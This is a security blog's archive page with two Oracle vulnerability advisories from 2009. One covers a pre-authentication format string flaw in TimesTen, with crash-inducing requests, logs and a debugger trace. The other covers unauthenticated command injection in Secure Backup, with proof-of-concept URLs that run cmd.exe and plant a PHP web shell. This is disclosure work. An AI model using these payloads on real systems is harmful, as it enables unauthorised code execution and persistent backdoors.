Category Archives: vulnerabilities

Owning Unix and Windows systems with a (somewhat) limited vulnerability

Auditing a product recently I noticed a curious scenario where I control the following:

  • Unix based: The limited vulnerability allows one to create any file as root controlling the contents of that file. I can even overwrite existing files.
  • Windows based: The vulnerability allows one to execute an operating system command but doesn’t allow, for some reason, copying files as the Unix vulnerability allows.

In the next paragraphs I will explain how one could exploit such somewhat limited scope vulnerabilities in order to execute remote arbitrary code in the context of the running application (root under Unix and SYSTEM under Windows). In any case, I’ll also explain the opposite case: one can execute an arbitrary operating system command in Unix based systems but can’t create an arbitrary file in the system and one can create an arbitrary file anywhere in the system in Windows operating systems but cannot execute an arbitrary command.
Continue reading

MyNav, a python plugin for IDA Pro

MyNav is an Open Source IDAPython plugin for the commercial disassembler IDA Pro to be released on July 2010. The plugin adds a lot of new features only available in other products like in the well known Zynamics BinNavi or HB Gary‘s Inspector. In this blog post I will show you some of the features available in the current version with some examples.
Continue reading

Oracle TimesTen Remote Format String

Product Description

Oracle TimesTen provides a family of real-time infrastructure software products designed for low latency, high-volume data, event and transaction management.

Summary

The Oracle January 2009 Critical Patch Update fixes a vulnerability which allows a remote preauthenticated attacker to execute arbitrary code in the context of the user running Oracle TimesTen server.

Affected versions

Oracle TimesTen prior to version 7.0.5.1.0.

Vulnerability

Oracle TimesTen’s timestend daemon is a simple web server that process the commands received from clients. Many of these commands are used without being authenticated, i.e., without the need for a username and password.

The command “evtdump” dumps to the internal log file the contents of an internal data structure. The pseudo-cgi evtdump only receives one parameter, called msg. The parameter “msg” is a text that will be printed to the log file before dumping the internal structure.

This parameter is vulnerable to a format string attack which leads to remote code execution before being authenticated. The vulnerability have been tested in Linux environments, although it appears to be vulnerable in all the supported platforms.

The following is an extract of a communication between a custom client and the timestend daemon (the output from the server is shown in the file /var/TimesTen/log/ttmesg.log in Unix and GNU/Linux environments):

FROM CLIENT:

GET evtdump?msg=AAAA%2510$x%25s HTTP/1.0\r\n\r\n

AT SERVER:

(…)
# cat /var/TimesTen/log/ttmesg.log
(…)
19:05:07.01 Info:    : 18225: maind 22: socket closed, calling recovery (last cmd was 25)
19:05:19.07 Info:    : 18225: AAAA80a8a0c(null)
19:05:19.07 Info:    : 18225: mode     :  TTDL_NORMAL
19:05:19.07 Info:    : 18225: ctlfilename :  ”
19:05:19.07 Info:    : 18225: lineno   :  0
19:05:19.07 Info:    : 18225: nitems   :  7
19:05:19.07 Info:    : 18225: maxitems :  32
19:05:19.07 Info:    : 18225: cur_path :  (null)
19:05:19.07 Info:    : 18225: lineno   :  0
19:05:19.07 Info:    : 18225: items    :
19:05:19.07 Info:    : 18225:   item # 0  :
19:05:19.07 Info:    : 18225:     comp     : ALL
19:05:19.07 Info:    : 18225:     level    : 3
19:05:19.07 Info:    : 18225:     dsname   : (null)
(…)

FROM CLIENT:

GET evtdump?msg=AAAA%2510$x%25s%25s%25s HTTP/1.0

AT SERVER:

(…)
# cat /var/TimesTen/log/ttmesg.log
19:05:19.08 Info:    : 18225: maind 23: socket closed, calling recovery (last cmd was 26)
19:06:18.49 Info:    : 18225: AAAA80a8a0c(null)(null)
19:06:18.49 Info:    : 18225: mode     :  TTDL_NORMAL
19:06:18.49 Info:    : 18225: ctlfilename :  ”
19:06:18.49 Info:    : 18225: lineno   :  0
19:06:18.49 Info:    : 18225: nitems   :  7
19:06:18.49 Info:    : 18225: maxitems :  32
19:06:18.49 Info:    : 18225: cur_path :  (null)
19:06:18.49 Info:    : 18225: lineno   :  0
19:06:18.49 Info:    : 18225: items    :
19:06:18.49 Info:    : 18225:   item # 0  :
19:06:18.49 Info:    : 18225:     comp     : ALL
19:06:18.49 Info:    : 18225:     level    : 3
19:06:18.49 Info:    : 18225:     dsname   : (null)
(…)

FROM CLIENT:

GET evtdump?msg=AAAA%25n HTTP/1.0

AT SERVER:

(…)
# cat /var/TimesTen/log/ttmesg.log
19:07:38.87 Err :    : 18782: TT14000: TimesTen daemon internal error: subd: Main daemon has vanished
19:07:38.87 Err :    : 18785: TT14000: TimesTen daemon internal error: subd: Main daemon has vanished
19:07:38.87 Err :    : 18788: TT14000: TimesTen daemon internal error: subd: Main daemon has vanished
19:07:38.87 Err :    : 18791: TT14000: TimesTen daemon internal error: subd: Main daemon has vanished
19:07:38.87 Info: SRV: 18800: EventID=99| TimesTen daemon has disconnected, server is exiting…
19:07:39.54 Info:    : 18785: Listener terminating
19:07:39.54 Info:    : 18785: Listener exited, termination finishing
19:07:39.54 Info:    : 18785: Process termination complete
19:07:39.59 Info:    : 18791: Listener terminating
19:07:39.59 Info:    : 18782: Listener terminating
19:07:39.59 Info:    : 18788: Listener terminating
19:07:39.59 Info:    : 18791: Listener exited, termination finishing
19:07:39.59 Info:    : 18791: Process termination complete
19:07:39.59 Info:    : 18782: Listener exited, termination finishing
19:07:39.59 Info:    : 18782: Process termination complete
19:07:39.59 Info:    : 18788: Listener exited, termination finishing
19:07:39.59 Info:    : 18788: Process termination complete
19:07:40.59 Info: SRV: 18800: EventID=2| TimesTen Server is stopping
19:07:40.59 Info: SRV: 18800: EventID=99| Server trying to stop child server processes
19:07:40.59 Info: SRV: 18800: EventID=11| Main Server cleaned up all child server processes and exiting
(…)

The last msg parameter’s value crashes the timestend daemon. Attaching with a debugger to the timestend daemon we can see the following dump when it crashes:

$ sudo /etc/init.d/tt_70 start &
(…)
$ sudo gdb attach `cat /var/TimesTen/tt70/timestend.pid`
(…)
(gdb) c
(…)
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1223386192 (LWP 18980)]
0xb76cf5c6 in vfprintf () from /lib/tls/i686/cmov/libc.so.6
(gdb) where
#0  0xb76cf5c6 in vfprintf () from /lib/tls/i686/cmov/libc.so.6
#1  0xb76eca36 in vsnprintf () from /lib/tls/i686/cmov/libc.so.6
#2  0xb7826ddb in ttc_vsnprintf () from /opt/TimesTen/tt70/lib/libttco.so
#3  0x0807689f in ttdLogDump ()
#4  0x0805b138 in daHandler ()
#5  0x08073789 in handlerThread ()
#6  0xb77e7341 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
#7  0xb775a4ee in clone () from /lib/tls/i686/cmov/libc.so.6
(gdb) i r
eax            0x0      0
ecx            0x4      4
edx            0x0      0
ebx            0xb77bbadc       -1216628004
esp            0xb71480c0       0xb71480c0
ebp            0xb71486e0       0xb71486e0
esi            0x0      0
edi            0xb714895c       -1223390884
eip            0xb76cf5c6       0xb76cf5c6 <vfprintf+14038>
(…)

The function ttdLogDump is called from daHandler as you can see in the backtrace. This function is the main handler for the internal timestend’s web server. This is the vulnerable function, ttdLogDump, which receives one argument (the msg parameter to the evtdump pseudo cgi):

.text:0807686D ttdLogDump      proc near               ; CODE XREF: daHandler+5F3p
  1. ()
  2. .text:08076879                 lea     eax, [ebp+argRet]
  3. .text:0807687C                 push    eax
  4. .text:0807687D                 push    [ebp+argMsg] ; User controlled string buffer
  5. .text:08076880                 push    0
  6. .text:08076882                 push    100h
  7. .text:08076887                 lea     esi, [ebp+buf]
  8. .text:0807688D                 call    $+5
  9. .text:08076892                 pop     ebx
  10. .text:08076893                 add     ebx, 3217Ah
  11. .text:08076899                 push    esi
  12. .text:0807689A                 call    _ttc_vsnprintf

The function ttc_vsnprintf makes a call internally to the vsnprintf function (in the library /opt/TimesTen/tt70/lib/libttco.so) passing as the buffer to be printed the user supplied value passed to the “msg” argument:

.text:0001ADAA ttc_vsnprintf   proc near               ; CODE XREF: msgbuf_error+73p
  1. .text:0001ADAA                                         ; opt_error+83p …
  2. .text:0001ADAA
  3. ()
  4. .text:0001ADCE                 push    [ebp+arg]       ; arg
  5. .text:0001ADD1                 push    [ebp+argFormat] ; format
  6. .text:0001ADD4                 push    edi             ; maxlen
  7. .text:0001ADD5                 push    eax             ; s
  8. .text:0001ADD6                 call    _vsnprintf

Workaround

None.

Patch information

Oracle fixed the vulnerability in version 7.0.5.1.0 of Oracle Secure Backup.

Contact Information

The vulnerability was found by Joxean Koret, admin[at]joxeankoret[dot]com

References

Oracle TimesTen evtDump Remote Format String

CVE-2008-5440

Oracle Critical Patch Update January 2009

Professional Web

Disclaimer

The information in this advisory and any of its demonstrations is provided “as is” without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

Oracle Secure Backup 10g Remote Code Execution

Product Description

Oracle Secure Backup is a centralized tape backup management software providing secure data protection for heterogeneous file systems and the Oracle Database.

Summary

The Oracle January 2009 Critical Patch Update fixes a vulnerability which allows a remote preauthenticated attacker to execute arbitrary code in the context of the user running the web server of Oracle Secure Backup.

In Windows environments, the vulnerability allows execution of arbitrary code as SYSTEM. In Unix and GNU/Linux environments, however, just as a normal user (oracle usually).

CVSS2 Risk Score

Microsoft Windows: 10
Linux and Unix   :  7,5

Affected versions

Oracle Secure Backup version 10.1.0.3 to 10.2.0.2 in all supported operating systems are affected.

Vulnerability Details

Oracle Secure Backup comes with one PHP based frontend which is vulnerable to a variable poisoning attack regardless if the PHP directive register_globals is enabled or not.

Internally, all the variables passed to the script login.php are converted to global variables in the file $ROOT\php\globals.php. Any variable regarding or regardless the method used to send the query will be registered as a global variable.

From the login script called “login.php” the tool “obt.exe” is executed with a popen call passing arguments received from the client. These arguments are not sanitized nor verified and it allows post-authentication remote command execution BUT due to a logic failure in the script “login.php” when the variable “clear” has the value “no” and other variables (that supposedly comes from a cookie) are set anyone can execute

operating system command from remote without being authenticated. The vulnerable code is the following:

if (strlen($ora_osb_bgcookie) > 0 && $button == “Logout”)
  1. {
  2. // Turn DEBUG_EXEC to off
  3. $tmp = $DEBUG_EXEC;
  4. $DEBUG_EXEC = "no";
  5.  
  6. // Teminate the connection.
  7. $qr_command = "$rbtool –terminate $ora_osb_bgcookie-$ora_osb_lcookie";
  8. $msg = exec_qr("$qr_command");
  9.  
  10. if (strncmp($msg[0], "Error:", 6))
  11. {
  12. // Set the cookie up.
  13. setcookie("ora_osb_bgcookie", "");
  14. setcookie("ora_osb_lcookie", "");
  15. $ora_osb_bgcookie = "";
  16. }
  17.  
  18. // Reset DEBUG_EXEC.
  19. $DEBUG_EXEC = $dtmp;
  20. }
  21. header("Location: /login.php?clear=yes");
  22. }

The function “exec_qr” internally calls the function PHP function “popen” to execute a command. The $rbtool variable, abusing from the variable poisoning attack, can be changed to, in example, /bin/sh or cmd.exe to execute arbitrary commands without the need for a user name or password, just with network access to the Oracle Secure Backup Web server. In fact, the script thinks that we’re doing a logout.

Proof of Concept

* Create a file in the directory “c:\”

https://<target>/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+hello+world+%3E+c:\oracle.secure.backup.txt+;

* Create a PHP backdoor

https://<target>/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+%22%3C%3Fphp+print(shell_exec(%24_GET%5B’a’%5D))%3B+%3F%3E%22+%3E+test.php%3B%26%26+echo

Workaround

Disable the web server.

Patch information

Oracle fixed the vulnerability in version 10.2.0.3 of Oracle Secure Backup.

Contact Information

The vulnerability was found by Joxean Koret, admin[at]joxeankoret[dot]com

References

Oracle Secure Backup exec_qr() Command Injection Vulnerability

CVE-2008-5448

Oracle Critical Patch Update January 2009

Professional Web

Disclaimer

The information in this advisory and any of its demonstrations is provided “as is”
without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of using the
information or demonstrations provided in any part of this advisory.